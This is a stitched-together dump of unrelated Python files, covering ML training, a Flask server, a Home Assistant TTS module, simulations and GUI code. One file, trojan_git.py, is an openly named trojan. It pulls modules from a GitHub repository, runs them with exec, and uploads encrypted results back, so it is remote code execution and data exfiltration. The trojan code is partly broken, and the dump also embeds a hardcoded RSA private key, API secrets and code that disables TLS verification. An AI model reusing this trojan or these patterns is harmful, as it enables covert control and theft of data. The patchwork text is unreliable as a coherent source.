snt_index = snt_index + 1
# use cuda
if use_cuda:
inp = inp.cuda()
if to_do == "train":
# Forward input, with autograd graph active
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
# Gradient Clipping (th 0.1)
# for net in nns.keys():
# torch.nn.utils.clip_grad_norm_(nns[net].parameters(), 0.1)
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
else:
with torch.no_grad(): # Forward input without autograd graph (save memory)
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
# read the config file
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
# save the output
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
# update it to the next batch
beg_batch = end_batch
end_batch = beg_batch + batch_size
# Progress bar
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
# clearing memory
del inp, outs_dict, data_set
# save the model
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
checkpoint["optimizer_par"] = optimizers[net].state_dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
# Write info file
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
# Getting the data for the next chunk (read in parallel)
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
|
server.py
|
from flask import Flask, request, jsonify, make_response, render_template
from flask_cors import CORS
import requests
import json
import flask
import threading
import updateCore, getRunning, controlProcess
global pid
pid = -1
global tid
tid = -1
app = Flask(__name__)
CORS(app)
@app.route('/startprocess', methods=['POST', 'GET'])
def startProcess():
global pid
pid = str(request.get_json(silent=True, force=True))
print(pid)
startThread = threading.Thread(target=controlProcess.start, args = (pid,))
startThread.start()
return 'Success', 200
@app.route('/endprocess', methods=['POST'])
def endProcess():
    global pid
    endThread = threading.Thread(target=controlProcess.stop, args=())
    endThread.start()
    pid = -1
return 'Success', 200
@app.route('/getrunning', methods=['POST'])
def getRun():
global pid
data = getRunning.main(pid)
print(data)
return jsonify({"data": data})
@app.route('/startthread', methods=['POST'])
def startThread():
global tid, pid
data = json.loads(request.data)
tid = str(data["data"])
rr = str(data["rr"])
startThread = threading.Thread(target=updateCore.start, args = (pid, tid, rr))
startThread.start()
return "Success", 200
@app.route('/endthread', methods=['POST'])
def endThread():
global tid
print("STOP Called")
updateCore.stop()
tid = -1
return "Success", 200
@app.route('/')
def main():
return render_template("index.html")
if __name__ == "__main__":
app.run(use_reloader = True, port = 4000, debug=True)
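# Example requests (sketch; assumes the server is running locally on port 4000 and that
# updateCore, getRunning and controlProcess are importable on the PYTHONPATH):
#   curl -X POST -H "Content-Type: application/json" -d '"1234"' http://localhost:4000/startprocess
#   curl -X POST http://localhost:4000/getrunning
#   curl -X POST -H "Content-Type: application/json" -d '{"data": 1, "rr": 10}' http://localhost:4000/startthread
#   curl -X POST http://localhost:4000/endthread
#   curl -X POST http://localhost:4000/endprocess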
|
api_tts.py
|
import os, hashlib, asyncio, threading, time, aiohttp, json, urllib
from mutagen.mp3 import MP3
from homeassistant.helpers import template
from homeassistant.const import (STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_OFF, STATE_UNAVAILABLE)
from .api_config import ROOT_PATH, ApiConfig
# Baidu TTS
IS_PY3 = True
from urllib.request import urlopen
from urllib.request import Request
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.parse import quote_plus
API_KEY = '4E1BG9lTnlSeIf1NQFlrSq6h'
SECRET_KEY = '544ca4657ba8002e3dea3ac2f5fdd241'
# Voice selection. Basic voices: 0 = Du Xiaomei, 1 = Du Xiaoyu, 3 = Du Xiaoyao, 4 = Du Yaya.
# Premium voices: 5 = Du Xiaojiao, 103 = Du Miduo, 106 = Du Bowen, 110 = Du Xiaotong, 111 = Du Xiaomeng. Default is Du Xiaomei.
PER = 4
# Speech rate, range 0-15, default 5 (medium)
SPD = 5
# Pitch, range 0-15, default 5 (medium)
PIT = 5
# Volume, range 0-9, default 5 (medium)
VOL = 5
# Downloaded audio format: 3 = mp3 (default), 4 = pcm-16k, 5 = pcm-8k, 6 = wav
AUE = 3
FORMATS = {3: "mp3", 4: "pcm", 5: "pcm", 6: "wav"}
FORMAT = FORMATS[AUE]
CUID = "123456PYTHON"
TTS_URL = 'http://tsn.baidu.com/text2audio'
class DemoError(Exception):
pass
""" TOKEN start """
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
SCOPE = 'audio_tts_post'  # this scope indicates TTS capability; if it is missing, enable it in the Baidu console
def fetch_token():
print("fetch token begin")
params = {'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY}
post_data = urlencode(params)
if (IS_PY3):
post_data = post_data.encode('utf-8')
req = Request(TOKEN_URL, post_data)
try:
f = urlopen(req, timeout=5)
result_str = f.read()
except URLError as err:
print('token http response http code : ' + str(err.code))
result_str = err.read()
if (IS_PY3):
result_str = result_str.decode()
print(result_str)
result = json.loads(result_str)
print(result)
    if 'access_token' in result and 'scope' in result:
        if SCOPE not in result['scope'].split(' '):
raise DemoError('scope is not correct')
print('SUCCESS WITH TOKEN: %s ; EXPIRES IN SECONDS: %s' % (result['access_token'], result['expires_in']))
return result['access_token']
else:
raise DemoError('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
""" TOKEN end """
class ApiTTS():
def __init__(self, media, cfg):
self.hass = media._hass
self.media = media
self.media_position = None
self.media_url = None
self.thread = None
self.tts_before_message = cfg['tts_before_message']
self.tts_after_message = cfg['tts_after_message']
tts_mode = cfg['tts_mode']
        if tts_mode not in (1, 2, 3, 4):
            tts_mode = 4
        self.tts_mode = tts_mode
        # TTS volume
self.tts_volume = 0
self.api_config = ApiConfig(os.path.join(os.path.dirname(__file__), 'dist/cache'))
def log(self, name,value):
self.media.log('【文本转语音】%s:%s',name,value)
    # Run the TTS logic asynchronously
    def async_tts(self, text):
        # If something is currently playing, pause it and remember the playback position
        if self.media._media_player is not None and self.media.state == STATE_PLAYING:
self.media.media_pause()
self.media_position = self.media.media_position
self.media_url = self.media.media_url
        # Play the given text
self.play_url(text)
        # Resume the previous playback at the saved position
        if self.media_url is not None:
self.log('恢复当前播放URL', self.media_url)
self.media._media_player.load(self.media_url)
time.sleep(2)
self.log('恢复当前进度', self.media_position)
self.media._media_player.seek(self.media_position)
self.media_url = None
    # Build the speech file and play it
    def play_url(self, text):
        # Generate the cache file name
f_name = self.api_config.md5(text + str(self.tts_mode)) + ".mp3"
        # Create the cache directory
_dir = self.api_config.get_path('tts')
self.api_config.mkdir(_dir)
        # Build the cached file path
ob_name = _dir + '/' + f_name
self.log('本地文件路径', ob_name)
        # Download the audio if it is not cached yet
        if not os.path.isfile(ob_name):
token = fetch_token()
            tex = quote_plus(text)  # the text needs to be urlencoded twice here
print(tex)
per = [1,0,3,4][self.tts_mode - 1]
            params = {'tok': token, 'tex': tex, 'per': per, 'spd': SPD, 'pit': PIT, 'vol': VOL, 'aue': AUE, 'cuid': CUID,
                      'lan': 'zh', 'ctp': 1}  # lan and ctp are fixed parameters
data = urlencode(params)
urllib.request.urlretrieve(TTS_URL + '?' + data, ob_name)
else:
            # Already cached, so just wait one second
time.sleep(1)
        # Build the local playback URL
local_url = self.hass.config.api.deprecated_base_url + ROOT_PATH + '/cache/tts/' + f_name
self.log('本地URL', local_url)
        if self.media._media_player is not None:
            self.media._media_player.is_tts = True
            # Save the current volume
volume_level = self.media.volume_level
            # If a non-zero TTS volume is configured, apply it
if self.tts_volume > 0:
print('设置TTS音量:%s'%(self.tts_volume))
self.media._media_player.set_volume_level(self.tts_volume / 100)
self.media._media_player.load(local_url)
            # Compute the audio duration and wait for playback to finish
audio = MP3(ob_name)
self.log('音频时长', audio.info.length)
time.sleep(audio.info.length + 2)
self.media._media_player.is_tts = False
            # Restore the previous volume
print('恢复音量:%s'%(volume_level))
self.media._media_player.set_volume_level(volume_level)
async def speak(self, call):
try:
text = call.data['message']
            # Render the template
tpl = template.Template(text, self.hass)
text = self.tts_before_message + tpl.async_render(None) + self.tts_after_message
self.log('解析后的内容', text)
            if self.thread is not None:
self.thread.join()
self.thread = threading.Thread(target=self.async_tts, args=(text,))
self.thread.start()
except Exception as ex:
self.log('出现异常', ex)
    # Clear the cache
async def clear(self, call):
try:
_path = self.api_config.get_path('tts')
self.api_config.delete(_path)
except Exception as ex:
self.log('出现异常', ex)
|
SimComponent.py
|
import time
# import ACS__POA
# from ACS import CBDescIn
from Acspy.Clients.SimpleClient import PySimpleClient
import random
from utils import HMILog
import threading
# acs client
client = PySimpleClient()
# get the components
t1_double = client.getComponent("TEST_JAVA_T1")
t2_double = client.getComponent("TEST_JAVA_T2")
class SimComp:
def __init__(self, site_type):
self.log = HMILog(title=__name__)
self.log.info([['y', " - SimComp - "], ['g', site_type]])
t = threading.Thread(target=self.sim_loop)
# set the thread to daemon for quicker termination
t.daemon = True
t.start()
return
def sim_loop(self):
"""
changes the values on the properties every second
"""
while True:
# every second set a random value on the property
t1_double.doubleRWProp.set_sync(random.random())
t2_double.doubleRWProp.set_sync(random.random())
time.sleep(1)
|
ithread.py
|
"""
Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from threading import Thread
class IThread:
def __init__(self, list):
try:
for func in list:
self.thread = Thread(target=func)
self.thread.start()
print("{} spawned".format(self.thread.getName()))
except BaseException as e:
print(e)
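# Usage sketch (hypothetical callables): one thread is spawned per function in the list;
# note that only the last Thread object is kept on self.thread.
#   IThread([lambda: print("worker 1"), lambda: print("worker 2")])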
|
httpserver.py
|
import sys
if sys.version_info < (3, 0):
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer as OriginalHTTPServer
else:
from http.server import HTTPServer as OriginalHTTPServer, SimpleHTTPRequestHandler
from scriptcore.encoding.encoding import Encoding
import os.path
import ssl
import threading
from time import sleep
class HttpServer(object):
def __init__(self, host='0.0.0.0', port=18888):
"""
Initiate the server object
:param host: The host
:type host: str
:param port: The port
:type port: int
"""
self.host = host
self.port = port
self._server = None
self._thread = None
self._data = []
def start(self):
"""
Start the server
"""
if self._thread:
return False
self._data = []
self._server = HTTPServer((self.host, self.port), HttpServerHandler)
dir_path = os.path.dirname(os.path.realpath(__file__))
key_file = os.path.join(dir_path, 'httpserver-cert.key')
cert_file = os.path.join(dir_path, 'httpserver-cert.crt')
self._server.socket = ssl.wrap_socket(self._server.socket,
keyfile=key_file,
certfile=cert_file,
server_side=True)
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.start()
return True
def stop(self):
"""
Stop the server
"""
if not self._thread:
return False
sleep(0.01)
self._data = self._server.data
self._server.shutdown()
self._thread = None
self._server = None
return True
def get_data(self):
"""
Get the data
"""
if self._server:
sleep(0.01)
return self._server.data
else:
return self._data
class HTTPServer(OriginalHTTPServer, object):
def __init__(self, *args, **kwargs):
"""
Initiate the server
"""
super(HTTPServer, self).__init__(*args, **kwargs)
self.data = []
class HttpServerHandler(SimpleHTTPRequestHandler, object):
def do_POST(self):
f = self.send_head()
data = Encoding.normalize(self.rfile.read(int(self.headers['Content-Length'])))
self.server.data.append(data)
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
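# Minimal usage sketch (assumes httpserver-cert.key/.crt exist next to this module):
#   server = HttpServer(port=18888)
#   if server.start():
#       ...  # clients can now POST to https://<host>:18888/ and the request bodies are collected
#       server.stop()
#       print(server.get_data())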
|
Main.py
|
import Bot
import MQTT
import Thinkspeak
import threading
a = threading.Thread(target=Bot.main)
b = threading.Thread(target=MQTT.main)
c = threading.Thread(target=Thinkspeak.main)
b.start()
c.start()
a.start()
|
test.py
|
# import multiprocessing
# import time
#
# def test1():
# while True:
# print("test1---1---")
# time.sleep(1)
# def test2():
# while True:
# print("test2---2---")
# time.sleep(1)
#
# def main():
# p1 = multiprocessing.Process(target=test1) # create the process objects
# p2 = multiprocessing.Process(target=test2)
# p1.start() # create and start the child processes
# p2.start()
# if __name__ == "__main__":
# main()
def test(*s):
print("---",s)
test() #()
test(1) #(1,)
test(1,2) #(1,2)
test(1,2,3) #(1,2,3)
def test2(**s):
print("+-+",s)
test2() #{}
test2(name="dog") #{'name': 'dog'}
test2(name="dog",man="people") # {'name': 'dog', 'man': 'people'}
test2(name="dog",man="people",girl="gold") #{'name': 'dog', 'man': 'people', 'girl': 'gold'}
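# Combined form (added example): positional arguments land in the tuple, keyword arguments in the dict
def test3(*args, **kwargs):
    print("+*+", args, kwargs)
test3(1, 2, name="dog")  # +*+ (1, 2) {'name': 'dog'}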
if 1:
    a = 10
    print(a)
|
trojan_git.py
|
#!/usr/bin/python
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
import github3
import lib_crypto as RSA
# -------- Configuration ---------- #
VERBOSE=False
code_private_key="""-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4BI+2xzBqLJivdx0i5zm85o+s6tCqU04sV1dDnKksZXgdb3I
hbsGR3DQh3zjfbu9dPregI9hNq6z53uvOYTu/SRPQlcJwHujWpCUIUGP4c3qk/R8
s2Oegq1jBznCazrwZ5QpMyBf3Yu4aYw9FUrqwxkW9kc7jXhUB8eMCKttkUcCEbHH
dIKkBK/6LuQOrHCn/9gFOOymRYQdlk5MDXx9vDTXiqMTuE8Sk7M2s8WKOysrX2yX
VF0TQrkBnibslrsMFjJgus2M8+la3sx6zBDDDlQIxnsU9Le7Z2J4eHMqzBfSRc/8
l4LAPtlXQg8Ju6OSqipRzW4lpnqYb60ieGaorwIDAQABAoIBADRcrymfD7ZvcVmy
8d1KXkIhEnQEGoDb1drE2aEts0T4pEp/fiOaL/5z45c13Sedvslecq6SUwJnUw1O
PwVvBjZLzOXQ1yuO+P6J+MPIwWngJ+hJYva82ebpw9GFcuSCEnnyCqqy7xQjuYWY
yxF1v2S2MUJ+JPGLY/+pZxUDkog3IsV/2HBLI/LX3TYUYwzkFHpCejGmXsSbOjeN
CQRuReGr+vHkOnlAzsLDrp4/VZZoebJEV5DFH32AAIj07kOKY4extsz5mm7LWpig
NAYREhftJLHwpGcF/NgAByME2tRu5yv4aSJFGRrAZJG4xpCD7xNAtjpYSHgfWrmx
pGestIkCgYEA5sEUujMM2Ap6Otbpgcg8Cx6vkJ7iYz0maU1/PyneUp19itXWmEQt
xRAd2EmT3X++AsUICRCDJNaIcPi8Cb5pmFstt///Q/1zg48+UryP2XDfaErknkst
YQLRJiAnv00nSGsGOjwhOj4sWp31BDUuuj1s1gekVKRSZpXE5N9c9R0CgYEA+JX9
YpHrZ2qXoiAsAn992sWYPfkPHn4gtjolHBNrcq442iw+7Zi/1WtWoO1yLuJn/eHZ
/GLDguWv/N0oCV3dfpglMjiVj+FrPJ/k3cnZEXLPXZ5q4VBKBE6488AVB513gdVP
96KRqIGYWrs/PhYJEd+QPjD14ci94sTKCKdx5zsCgYA8IZh7JQ51xdUwPAzBayJq
a2aosx6fabH2wuEj3o82zB+I7ExthWa/8YE1eYb0s3MaWanMYucp1FXdypOFnn75
2tjBGA628vcFE3DUMprxuL4e+VU2ArUikI9b9gklir9v2aPXzQ+Dk+wO+RZ+MDWr
BpKz+23ROLjYTrLuSV556QKBgQC+uQVhXSdJfyS7xQc/G2YKNdQqqC4LbSXX6iCS
u+uSX01LRus5DBsSuXoLmmIiyp6S0XeYBoaOpX8y+NNA7H2GJWFUeMl3TLIkH2FP
MRCULIwg/exu1lUTnPqWOWdpIk2QlYL3MgmjSVsFMejBz9JBnk9jB9l+06+sjuOb
ZC0mBQKBgEivm/d5OfCiCBXSuqD0/KMVQKHKsIAg7f/1xgM58tlBryT9M6o6FqWY
XplsAj8W62HHViXuit3tOcRq92D+PHJIJlEAJZG+VZ5jEIIEJYzEe72x8m7D9E85
3MuWeRQ6uDZAYTvWmyZ33H/YHhEhelu4QPioNvR4FXPJtuwjFKUM
-----END RSA PRIVATE KEY-----"""
# -------- Variabels ---------- #
trojan_id = ""
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_module = []
configured = False
config = None
task_queue = Queue.Queue()
data_public_key=""
code_public_key=""
class GitImporter(object):
def __init__(self):
self.current_module_code=""
def find_module(self, fullname, path=None):
if configured:
print "[*] Attemtping to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def random_hex_string():
hex_string = str(hex(random.randint(0x10000000,0xFFFFFFFF))).upper()[2:10]
return hex_string
def connect_to_github():
gh = login(username="username", password="password")
repo = gh.repository("username","trojan")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filepath.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha']).content.read()
content = RSA.decrypt(blob, code_private_key, VERBOSE)
return content
return None
def get_trojan_config():
global configured
global config
# Search for remote config file
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if trojan_id in filename.path:
configured = True
# If not found generate and save
if not configured:
generate_trojan_config(gh, repo, branch)
# Load config file
trojan_config = "config/%s.json" % trojan_id
config_json = get_file_contents(trojan_config)
config = json.load(base64.b64decode(config_json))
configured = True
for task in config:
if 'module' in task:
if task['module'] not in sys.modules:
exec ("import %s" % task['module'])
return config
def generate_trojan_config(gh, repo, branch):
global configured
config_json = "config/%s.json" % trojan_id
# Generate default config file
buffer_json = get_file_contents("config/default_config.json")
buffer = base64.b64decode(buffer_json)
print "[*] Generated configuration: %s" % config_json
commit_message = "Generated configuration: %s" % config_json
# Save config file in config folders
repo.create_file(config_json,commit_message,base64.b64encode(RSA.encrypt_string(buffer,code_public_key, VERBOSE)))
return True
def check_trojan_id():
global trojan_id
global configured
configured = False
found_id = False
# Check for ID file
for file in os.listdir("."):
if "id" in file:
found_id = True
if found_id:
with open('id') as file_object:
trojan_id = file_object.read().rstrip()
print "[*] Found ID (%s)" % trojan_id
file_object.close()
else:
# Generate and save ID
trojan_id = random_hex_string()
print "[*] Generating and saving ID (%s)" % trojan_id
with open('id', 'w') as file_object:
file_object.write("%s" % trojan_id)
file_object.close()
return trojan_id
def store_module_result(data):
global data_public_key
gh, repo, branch = connect_to_github()
data_public_key=get_file_contents("/config/data_key.pub")
data = RSA.encrypt_string(data, data_public_key, VERBOSE)
tm_year = time.gmtime(time.time())[0]
tm_mon = time.gmtime(time.time())[1]
tm_mday = time.gmtime(time.time())[2]
tm_hour = time.gmtime(time.time())[3]
tm_min = time.gmtime(time.time())[4]
tm_sec = time.gmtime(time.time())[5]
date = "%s-%s-%s_%s-%s-%s" % (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec)
remote_path = "data/%s/%s_%s.data" % (trojan_id, module, date)
commit_message = "Upload Data: %s_%s from ID: %s" % (module, date, trojan_id)
repo.create_file(remote_path,commit_message,base64.b64encode(data))
return True
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
store_module_result(result)
return
# !------ Main Loop ------! #
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
code_public_key=get_file_contents("config/code_key.pub")
# Check if Trojan has an unique ID
check_trojan_id()
config = get_trojan_config()
## Task = Run
if config[0]['task'] == 'run':
for task in config:
if 'module' in task:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
## Task = Kill
if config[0]['task'] == 'kill':
print "[!!!] Trojan kill itself"
sys.exit(1)
## Task = Pause
if config[0]['task'] == 'pause':
print "[?] Trojan is in pause mode"
task_pause = random.randint(config[0]['task_pause_min'],config[0]['task_pause_max'])
print "[*] Waiting for %s seconds" % task_pause
time.sleep(task_pause)
|
module.py
|
# tv
#
# Catbox module for playing online videos of birds and squirrels.
# Support for offline tv maybe in the future.
#
# Authors:
# Jonathon Roscoe / @jroscoe5
# Kyle Roscoe / @kroscoe45
import glob
import os
from queue import Queue
from threading import Thread
from time import sleep
from chromedriver_py import binary_path
from modules.base_module import BaseModule
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
class TVModule(BaseModule):
"""
Plays online bird and squirrel videos using chromedriver and selenium.
"""
def __init__(self) -> None:
super().__init__()
self.event_queue = Queue()
self.tv_running = False
def register(self, emitter) -> None:
super().register(emitter)
@emitter.on(self.codes['start_timed_tv'])
def start_timed_tv(duration):
self.event_queue.put(['start', duration])
@emitter.on(self.codes['stop_tv'])
def stop_tv():
self.event_queue.put(['stop', None])
def launch(self) -> None:
super().launch()
while True:
event = self.event_queue.get(block=True)
if event[0] == 'start':
self.tv_running = True
Thread(target=self.__launch_timed_tv, args=(event[1],), daemon=True).start()
self.emitter.emit(self.codes['print'], 'time for some tv!')
if event[0] == 'stop':
self.emitter.emit(self.codes['print'], 'turning off tv!')
self.tv_running = False
def __launch_timed_tv(self, duration):
"""
Navigates to a video, full screens it and then sleeps until stopped or
duration times out.
"""
extensions_folder = os.path.dirname(os.path.realpath(__file__)) + '/data'
extensions_list = glob.glob(f'{extensions_folder}/*.crx')
options = Options()
chromeOptions = webdriver.ChromeOptions()
options.add_experimental_option("useAutomationExtension", False)
options.add_experimental_option("excludeSwitches",["enable-automation"])
for extension in extensions_list:
options.add_extension(extension)
driver = webdriver.Chrome(executable_path=binary_path, options=options)
driver.implicitly_wait(10)
driver.get('https://www.youtube.com/watch?v=56359TnQGww')
sleep(5)
video_element = driver.find_element_by_id('ytd-player')
actionChains = ActionChains(driver)
actionChains.double_click(video_element).perform()
sleep(5)
video_element.click()
while (duration > 0 and self.tv_running):
sleep(1)
duration -= 1
driver.quit()
|
ticrate.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from multiprocessing import Process
from random import choice
import os
import vizdoom as vzd
DEFAULT_CONFIG = os.path.join(vzd.scenarios_path, "basic.cfg")
def play(config_file, ticrate=35):
game = vzd.DoomGame()
game.load_config(config_file)
game.set_mode(vzd.Mode.ASYNC_PLAYER)
game.set_ticrate(ticrate)
game.init()
actions = [[True, False, False],
[False, True, False],
[False, False, True]]
episodes = 10
for i in range(episodes):
game.new_episode()
while not game.is_episode_finished():
game.make_action(choice(actions))
game.close()
if __name__ == "__main__":
parser = ArgumentParser("ViZDoom example showing how to change the ticrate for asynchronous mode.")
parser.add_argument(dest="config",
default=DEFAULT_CONFIG,
nargs="?",
help="Path to the configuration file of the scenario."
" Please see "
"../../scenarios/*cfg for more scenarios.")
parser.add_argument("-t", "--ticrates",
default=[17,35,70],
nargs="+",
help="List of ticrates to show.")
args = parser.parse_args()
processes= []
for ticrate in args.ticrates:
p = Process(target=play, args=[args.config, ticrate])
p.start()
processes.append(p)
for p in processes:
p.join()
|
form.py
|
import os
from gi.repository import Gtk, Gdk, GLib, GObject, GdkPixbuf
import math
from src.simulation import Simulation
from threading import Thread, Event
GLADE_MARKUP = 'os-simulator.glade'
class Dialog(Gtk.Dialog):
def __init__(self, parent, title, message):
Gtk.Dialog.__init__(self, title, parent, 0,
(Gtk.STOCK_OK, Gtk.ResponseType.OK))
# self.set_default_size(150, 100)
label = Gtk.Label(message)
box = self.get_content_area()
box.add(label)
self.show_all()
class OsSimulatorWindow(object):
AVG_INNER_PLOT = 'avg_inner.png'
AVG_TOTAL_PLOT = 'avg_total.png'
def __init__(self, builder):
super(OsSimulatorWindow, self).__init__()
self.builder = builder
self.builder.connect_signals(self)
self.window = builder.get_object('os_simulator_window')
self.delta_text = builder.get_object('delta_text')
self.buffer_size_text = builder.get_object('buffer_size_text')
self.buffer_latency_text = {
'min': builder.get_object('buffer_latency_min_text'),
'max': builder.get_object('buffer_latency_max_text'),
'step': builder.get_object('buffer_latency_step_text'),
}
self.gen_lambda_text = {
'min': builder.get_object('lambda_min_text'),
'max': builder.get_object('lambda_max_text'),
'step': builder.get_object('lambda_step_text'),
}
self.time_distrib_text = {
'mu': builder.get_object('solve_time_distrib_mu_text'),
'sigma': builder.get_object('solve_time_distrib_sigma_text'),
}
self.simulation_time_text = builder.get_object('simulation_time_text')
self.exp_per_conf_text = builder.get_object('exp_per_conf_text')
self.sim_finished_event = Event()
self.images_box = builder.get_object('images_box')
self.images = {
'inner': builder.get_object('avg_inner_plot'),
'total': builder.get_object('avg_total_plot'),
}
self.simulation_thread = None
self.simulation_finished = False
def show(self):
self.window.show_all()
def on_os_simulator_window_configure_event(self, *args):
if self.simulation_finished:
self._draw_images()
def on_os_simulator_window_destroy(self, *args):
if self.simulation_thread is not None:
# self.simulation_thread.stop()
pass
Gtk.main_quit(*args)
def on_simulate_button_clicked(self, *args):
try:
delta = int(self.delta_text.get_text())
buffer_size = int(self.buffer_size_text.get_text())
buffer_latency = xrange(int(self.buffer_latency_text['min'].get_text()),
int(self.buffer_latency_text['max'].get_text()),
int(self.buffer_latency_text['step'].get_text()))
gen_lambda = xrange(int(self.gen_lambda_text['min'].get_text()),
int(self.gen_lambda_text['max'].get_text()),
int(self.gen_lambda_text['step'].get_text()))
time_distrib = dict(mu=float(self.time_distrib_text['mu'].get_text()),
sigma=float(self.time_distrib_text['sigma'].get_text()))
sim_time = int(self.simulation_time_text.get_text())
exp_per_conf = int(self.exp_per_conf_text.get_text())
data = dict(delta=delta, buffer_size=buffer_size, buffer_latency=buffer_latency,
gen_lambda=gen_lambda, time_distrib=time_distrib, sim_time=sim_time,
exp_per_conf=exp_per_conf)
def target():
self.on_simulation_started()
Simulation().simulation(**data)
GLib.idle_add(self.on_simulation_finished)
self.simulation_thread = Thread(target=target)
self.simulation_thread.start()
except ValueError as e:
self.display_dialog('Error', 'Incorrect data')
print e
pass
def display_dialog(self, title, message):
dialog = Dialog(self.window, title, message)
response = dialog.run()
if response == Gtk.ResponseType.OK:
print("The OK button was clicked")
dialog.destroy()
def on_simulation_started(self):
print 'Simulation started'
self.simulation_finished = False
if os.path.isfile(self.AVG_INNER_PLOT):
os.remove(self.AVG_INNER_PLOT)
if os.path.isfile(self.AVG_TOTAL_PLOT):
os.remove(self.AVG_TOTAL_PLOT)
def on_simulation_finished(self):
print 'Simulation finished'
self.simulation_finished = True
self.display_dialog("Info", "finished")
self._draw_images()
def _draw_images(self):
rect = self.images_box.get_allocation()
width = rect.width
height = rect.height / 2
